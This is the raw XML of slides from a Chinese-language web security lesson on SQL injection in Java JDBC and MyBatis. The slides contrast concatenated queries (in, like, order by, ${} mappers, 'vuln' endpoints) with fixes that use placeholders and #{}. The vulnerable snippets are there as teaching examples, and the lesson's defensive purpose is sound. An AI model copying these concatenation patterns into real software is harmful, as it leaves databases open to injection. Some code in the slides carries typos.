  <p:transition spd="slow"/>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801761" y="1855038"/>
            <a:ext cx="22020139"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endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>​ 删除语句中可能会存在此类语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>由于无法确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>delIds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>含有对象个数而直接拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句，造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = "delete from users where id in("+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>delIds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+"); //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>​ 解决方法为遍历传入的 对象个数，使用“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>占位符。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>​ 使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句直接拼接会造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = "select * from users where password like '%" + con + "%'"; //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</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801761" y="1855038"/>
            <a:ext cx="22020139" cy="9529485"/>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endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.4.%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>​ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>没有手动过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。预编译是不能处理这个符号的， 所以需要手动过滤，否则会造成慢查询，造成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.5.Order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等无法预编译</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>​ 通过上面对使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关键字和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关键字发现，只需要对要传参的位置使用占位符进行预编译时似乎就可以完全防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入，然而事实并非如此，当使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句时是无法使用预编译的，原因是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>子句后面需要加字段名或者字段位置，而字段名是不能带引号的，否则就会被认为是一个字符串而不是字段名，然而使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PreapareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将会强制给参数加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，所以，在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句时就必须得使用拼接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，所以就会造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入，需要进行手动过滤，否则存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>​ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = "Select * from news where title =?" + "order by '" + time + "' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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0843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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="2270263"/>
            <a:ext cx="21374818" cy="3894208"/>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随着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Web2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、社交网络、微博等等一系列新型的互联网产品的诞生，基于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环境的互联网应用越来越广泛，企业信息化的过程中各种应用都架设在</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平台上，</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业务的迅速发展也引起黑客们的强烈关注，接踵而至的就是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安全威胁的凸显，黑客利用网站操作系统的漏洞和</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服务程序的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注入漏洞等得到</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服务器的控制权限，轻则篡改网页内容，重则窃取重要内部数据，更为严重的则是在网页中植入恶意代码，使得网站访问者受到侵害。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web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>安全主要分为保护服务器及其数据的安全、保护服务器和用户之间传递的信息的安全、保护</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应用客户端及其环境安全这三个方面。</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1940" y="5981700"/>
            <a:ext cx="10229010" cy="575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二</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err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>parameterType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>向</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语句传参，在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引用传参可以使用</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两种方式</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 .${Parameter}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>方式</a:t>
            </a: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采用拼接的方式构造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语句，在对用户输入过滤不严格的前提下，存在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List&lt;User&gt; findByUserNameVuln01(@Param("username")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@GetMapping("/mybatis/vuln01")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>public List&lt;User&gt; mybatisVuln01(@RequestParam("username")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userMapper.findByUserNameVuln01(username);</a:t>
            </a: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49" y="9320213"/>
            <a:ext cx="19672775" cy="26241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202112291641500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49" y="11192807"/>
            <a:ext cx="18288000" cy="2181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2.#{Parameter}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>方式</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采用预编译的方式构造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语句，避免了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注入的产生</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User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>findByUserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(@Param("username")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@GetMapping("/mybatis/sec01")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>public User mybatisSec01(@RequestParam("username")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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>userMapper.findByUserName</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zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B050302020402020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0" y="8324215"/>
            <a:ext cx="119634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160" y="9944100"/>
            <a:ext cx="17964150"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433625"/>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3.MyBatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>易产生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注入的三种情况</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>3.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>模糊查询</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>​ 在这种情况下使用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程序会报错，新手程序员就把</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号改成了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这样如果</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代码层面没有对用户输入的内容做处理势必会产生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id="findByUserNameVuln02"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'%${_parameter}%'</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正确写法如下：</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>findByUserNamesec</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('%',#{_parameter}, '%')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>&lt;/select&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>这样拼接就不会存在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oracle:</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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlserver</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002738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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3.2 </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语句时直接使用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会报错，可能会存在使用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直接拼接，造成</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id="findByUserNameVuln04"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id in (${id})</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正确用法为使用</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，而不是将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替换为</a:t>
            </a:r>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id in&lt;foreach collection="ids" item="item" open="("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>separatosr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>="," close=")"&gt;#{ids} &lt;/foreach&gt;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3.3</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order by </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同理，使用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方式传参会导致</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语句失效，所以使用</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语句的时候还是需要做好过滤</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三</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-plus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与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>SpringDataJpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>类似，</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-plus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>提供了相关的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>funciton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>进行</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的操作，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>like("name","</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>tks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>")——&gt;name like '%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>tks</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，同时也很贴心的考虑到了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注入问题，对绝大部分场景进行了预编译处理。但是类似动态表名、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>orderby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>这种需要拼接的场景在实际开发中还是需要额外的注意。</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传统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mybaits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>框架对于</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范围查询和</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模糊查询需要做额外的处理：</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模糊查询需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mapperxml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>配置中用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的内置函数进行拼接，拼接后再采用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预编译的方式进行查询；</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范围查询的话需要在进行同条件多值查询的时候，可以使用</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自带的循环指令</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来解决</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语句动态拼接的问题；</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mybatis-puls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>已经考虑到</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注入的影响，相关</a:t>
            </a:r>
            <a:r>
